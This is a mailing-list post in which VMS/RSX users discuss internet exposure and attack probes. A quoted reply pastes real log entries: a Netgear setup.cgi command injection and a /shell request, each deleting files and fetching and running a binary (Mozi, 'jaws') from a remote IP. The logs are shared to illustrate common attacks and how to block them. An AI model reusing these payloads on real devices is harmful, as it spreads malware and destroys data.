[Info-vax] Anti-virus ?

plugh jchimene at gmail.com
Mon Aug 14 10:11:47 EDT 2023 

On Monday, August 14, 2023 at 4:12:37 AM UTC-7, Johnny Billquist wrote:
> On 2023-08-12 12:59, plugh wrote: 
> > On Saturday, August 12, 2023 at 3:41:28 AM UTC-7, Johnny Billquist wrote: 
> >> On 2023-08-11 19:35, Simon Clubley wrote: 
> >>> Oh, and BTW, judging by the fact Eisner has needed to be rebooted multiple 
> >>> times over the years due to various services locking up presumably due to 
> >>> attacks, I have little confidence that VMS in general would be robust 
> >>> within an actively hostile environment. 
> >> I think you are misinterpreting some data, as well as making some 
> >> assumptions that I don't think are correct. 
> >> 
> >> By the way, I have an RSX system publicly on the internet, and it's 
> >> totally without firewalls, and on 24/7. Mainly to actually harden it. 
> >> But it's basically running stable without any issues since many years. 
> >> 
> >> So much for "hostile environment" being such a big problem. (Although I 
> >> should admit that I don't have some of the fancy services that are easy 
> >> to exploit...) 
> >> 
> >> Johnny 
> > 
> > It's that last part that is quite important these days. It's all about services now, as communication is so important. So much of this security stuff was known by Digital, such knowledge has simply been left to rot.
> Oh. But it's not that I don't have any services... I do have some. But I 
> guess it's a combination of me really into writing services that ever 
> execute something passed in, with the assumption that it will look fine. 
> I completely abhor the REST paradigm. It's such a poor idea from the 
> start. (I don't start ranting about people who embrace it...) 
> The other part being that RSX is such an odd system to start with that 
> pretty close to nobody even cares to try and figure out how to actually 
> exploit anything. They are just running various scripts and tools that 
> tries to exploit usual, well known issues in various services. 
> 
> It's actually a very good way of finding out what issues are the most 
> common ones. I get plenty of probes for things in wordpress for example. 
> So that one seems popular (and bad). Netgear seems to also have some 
> popular exploits. Then apparently just badly setup CGI stuff in general. 
> 
> Examples: 
> 
> . GET /wp-login.php 
> 
> (seems to be just lots of these probing if wordpress is running on the 
> host, so lots of variations on this one...) 
> 
> 
> . GET 
> /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http:/60.189.27.88:43788/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/&currentsetting.htm=1 
> 
> (I think we can safely assume thatn 60.189.27.88 isn't an official site 
> of netgear configurations...) 
> 
> 
> . GET /shell?cd+/tmp;rm+-rf+*;wget+94.158.247.123/jaws;sh+/tmp/jaws 
> 
> (Do people really setup their web servers to have shell as a CGI???) 
> 
> 
> Those are just a few examples from just a couple of hours of logs on my 
> RSX machine... 
> 
> Johnny

How is RSX configured to respond to these requests? It's impressive how many of these requests can be stuffed into the pipeline from one IP.

I'm particularly impressed by attacks from soi-disant whitehats.

It was one of my first tests of generative AI: Translate the phrase “va fa culo” from Italian to at 10 different languages including Klingon, Esperanto, English. Include at least one rte language

As part of a "get off my servers" message to one of them. It's a nice form of extortion.

It doesn't seem much use to have these sorts of logs with an active response component. Certainly writing emails is fun, but it can accomplish only so much. Most of the WordPress stuff has to be blocked by packet filtering after so many of these attempts from the same address. Some of these clowns have to invest serious money to get blocks of IP addresses from which to launch these attacks. Yes, WordPress certainly has a big target on its back: "Interesting birthmark you got there, Hal"
I mean how many "get wplogin" requests do you allow before blocking that address? If the rsx system is just a honeypot, nevermind.

More information about the Info-vax mailing list